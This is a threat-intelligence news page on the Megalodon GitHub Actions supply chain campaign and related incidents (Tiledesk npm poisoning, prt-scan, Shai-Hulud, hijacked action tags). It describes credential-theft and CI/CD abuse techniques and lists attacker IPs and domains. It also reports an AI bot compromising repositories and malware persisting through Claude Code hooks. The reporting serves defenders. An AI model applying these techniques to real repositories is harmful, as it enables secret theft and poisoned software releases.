Megalodon GitHub Supply Chain Attack Injected Malicious Actions into 5,561 Repos
Researchers disclosed a large-scale automated supply chain attack dubbed Megalodon that pushed 5,718 malicious commits into 5,561 GitHub repositories in less than six hours, using forged CI/CD bot identities and benign-looking commit messages to slip in malicious GitHub Actions workflow files. The workflows requested elevated permissions and carried base64-encoded bash payloads that executed after maintainers merged the changes, harvesting CI/CD environment data, cloud credentials, SSH keys, Docker and Kubernetes secrets, Vault and Terraform credentials, GitHub OIDC tokens, and other source-code and developer secrets. Investigators said the stolen data was exfiltrated over HTTP POST requests to 216.126.225[.]129:8443, with two workflow variants observed, including payloads labeled SysDiag and Optimize-Build.
The most visible downstream impact was a compromise of the Tiledesk repository, where a malicious workflow change led to the publication of poisoned @tiledesk/tiledesk-server npm versions 2.18.6 through 2.18.12. Reporting tied the activity to a broader pattern of software supply chain abuse associated with TeamPCP, whose earlier incidents affected major open-source and commercial projects and prompted npm to invalidate some write-capable granular access tokens that could bypass 2FA protections. Security firms urged organizations to review repositories for unauthorized workflow changes, block the identified command-and-control infrastructure, rotate exposed secrets and keys, and inspect cloud and CI logs for signs of credential theft or cloud impersonation.
How this story unfolded
7 events from the most recent confirmed update back to the earliest known activity.
Additional Megalodon victims Black-Iron-Project and WISE-Community identified
StepSecurity reported that Black-Iron-Project and WISE-Community were among the confirmed repositories compromised in the Megalodon campaign, expanding the list of specifically named victims beyond Tiledesk. The report placed these victim disclosures in the context of the May 18 mass GitHub Actions workflow compromise affecting 5,561 repositories.
Researchers identify malicious Polymarket-themed npm packages tied to same activity
SafeDep separately identified a throwaway npm publisher, polymarketdev, that uploaded nine malicious Polymarket-themed packages intended to trick users into submitting Ethereum or Polygon private keys to a Cloudflare Worker endpoint. The packages were reported in coverage of the broader Megalodon and related supply chain activity.
SafeDep discloses Megalodon campaign and links it to widespread repo abuse
By 2026-05-21, SafeDep had publicly reported the Megalodon campaign, stating that thousands of repositories were affected and detailing the malicious workflow techniques and credential theft behavior. Reporting also connected the activity to a broader software supply chain abuse wave associated with TeamPCP.
Tiledesk repository compromise leads to poisoned npm package releases
As a downstream impact of the GitHub compromises, a malicious workflow change in the Tiledesk repository resulted in the maintainer publishing compromised @tiledesk/tiledesk-server npm versions 2.18.6 through 2.18.12. SafeDep identified the embedded payload in the Tiledesk package and linked it to the broader Megalodon campaign.
Malicious workflows steal CI/CD and cloud secrets via Megalodon payloads
The implanted GitHub Actions workflows deployed base64-encoded bash payloads that harvested CI environment data, cloud credentials, SSH keys, Docker and Kubernetes secrets, Vault and Terraform credentials, GitHub OIDC tokens, and other source-code-related secrets. Researchers said the stolen data was exfiltrated to 216.126.225.129:8443, including via HTTP POST requests using the parameter string "megalodon."
Megalodon campaign compromises thousands of GitHub repositories
On 2026-05-18, an automated supply chain attack dubbed Megalodon pushed 5,718 malicious commits into 5,561 GitHub repositories within roughly six hours. The commits used fake CI/CD bot-style identities and inserted malicious GitHub Actions workflow files designed to run after merges or remain dormant for later activation.
Claude-powered AI bot compromises five GitHub repositories
A separate supply chain incident reportedly involved a Claude-powered AI bot compromising five major GitHub repositories. This predates the May 2026 Megalodon campaign and represents a distinct repository compromise event.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
12 references tracked. Mallory keeps watching after this page renders.
Megalodon GitHub Supply Chain Attack Hits 5,500+ Repos
thecyberexpress.com
Open sourceSecPod | Prevent Cyberattacks
secpod.com
Open sourceAutomated 'Megalodon' Campaign Spreads GitHub Repo Backdoors
bankinfosecurity.com
Open sourceAutomated 'Megalodon' Campaign Spreads GitHub Repo Backdoors
govinfosecurity.com
Open sourceMegalodon chums the waters in 5.5K+ GitHub repo poisonings
theregister.com
Open sourceMegalodon: Mass GitHub Actions Secret Exfiltration Across 5,500+ Public Repositories - StepSecurity
stepsecurity.io
Open sourceMegalodon: CI/CD Malware Spreading Across GitHub Repositories
ox.security
Open sourceAI bot compromises five major GitHub repositories | Cybernews
cybernews.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Misconfigured `pull_request_target` GitHub Actions enabled supply chain compromises
Researchers reported that insecure GitHub Actions workflows using the privileged `pull_request_target` trigger exposed major open source repositories to secret theft and supply chain abuse. Sysdig found workflows in projects including **MITRE** `mitre-attack/car`, **Splunk** `security_content`, and **spotipy** that checked out and executed untrusted forked pull request code in privileged CI contexts, enabling exfiltration of secrets and abuse of high-permission `GITHUB_TOKEN` access. Spotipy assigned **`CVE-2025-47928`** and fixed the issue after disclosure, MITRE remediated its workflow, and Splunk patched its pipeline. Wiz later described a large-scale campaign dubbed **prt-scan** that weaponized the same weakness across GitHub, sending more than 500 malicious pull requests in multiple waves and using increasingly tailored, AI-assisted payloads against Python, Node.js, Go, Rust, and GitHub Actions projects. Most attempts were blocked by contributor approval gates and workflow restrictions, but Wiz confirmed compromise of at least two npm packages—**`@codfish/eslint-config`** and **`@codfish/actions`**—across 106 versions, along with theft of credentials including **AWS keys**, **Cloudflare API tokens**, and **Netlify auth tokens**. The incidents underscored that repositories running untrusted PR code under `pull_request_target` can turn CI/CD pipelines into a direct path for secret exposure and downstream package compromise.
May 12, 2026
Shai-Hulud Supply-Chain Attack Published Signed Malicious npm and PyPI Packages
A cross-ecosystem software supply-chain campaign dubbed **Shai-Hulud** compromised more than 170 packages—and possibly hundreds of package versions—across **npm**, **PyPI**, and **Composer**, including projects tied to **TanStack**, **Mistral AI**, **OpenSearch**, **Guardrails AI**, **UiPath**, **Bitwarden CLI**, and official **SAP** packages. Researchers attributed the activity to **TeamPCP**, which abused GitHub Actions workflows by chaining `pull_request_target` misuse, cache poisoning, and theft of GitHub Actions **OIDC** tokens and other credentials from runner environments. That access let the attackers publish malicious updates carrying apparently legitimate **SLSA Build Level 3** provenance, **Sigstore** attestations, and valid GitHub Actions signatures, undermining trust in signed package releases. The malicious packages included obfuscated payloads such as `router_init.js` and `setup.mjs` that profiled developer and CI/CD environments, stole secrets, and attempted self-propagation by harvesting npm tokens and abusing 2FA bypass paths. Reported targets included **AWS IAM credentials**, **GitHub PATs**, **HashiCorp Vault tokens**, and **Kubernetes secrets**, with exfiltration routed through the **Session** P2P network. The malware also established persistence by modifying **Claude Code** hooks and **VS Code** auto-run tasks so it could relaunch on startup. Defenders were urged to assume credential exposure if affected versions were installed, rotate secrets, inspect systems for persistence artifacts and unauthorized services, block known command-and-control infrastructure, and pin dependencies to verified hashes.
May 25, 2026
Compromised GitHub Actions tags exfiltrated CI/CD secrets from runners
Threat actors compromised the popular GitHub Actions repositories `actions-cool/issues-helper` and `actions-cool/maintain-one-comment` by moving version tags to imposter commits outside the normal commit history, causing workflows that referenced those tags to fetch and run malicious code. Researchers said the payload downloaded the **Bun** JavaScript runtime, read memory from the GitHub Actions `Runner.Worker` process to recover decrypted secrets, and exfiltrated the data over HTTPS to the attacker-controlled domain `t.m-kosche[.]com`; workflows pinned to a known-good full commit SHA were not affected. GitHub later disabled access to the repository for a terms-of-service violation, while StepSecurity added the action to its Compromised Actions Policy and blocked the exfiltration domain through Harden-Runner. The incident highlights a broader GitHub Actions supply-chain risk in which CI/CD trust can be subverted through mutable references and weak integrity controls. Separate research showed that a modified Maven wrapper in a pull request could achieve code execution on GitHub-hosted runners and, if merged, later expose release secrets such as Maven publishing credentials and GPG material, underscoring the need for checksum validation on wrapper scripts and immutable pinning to trusted commit SHAs for third-party actions. StepSecurity also linked the same exfiltration infrastructure to the recent **Mini Shai-Hulud** activity targeting npm packages in the `@antv` ecosystem, suggesting the GitHub Actions compromise may be part of a wider supply-chain campaign.
May 19, 2026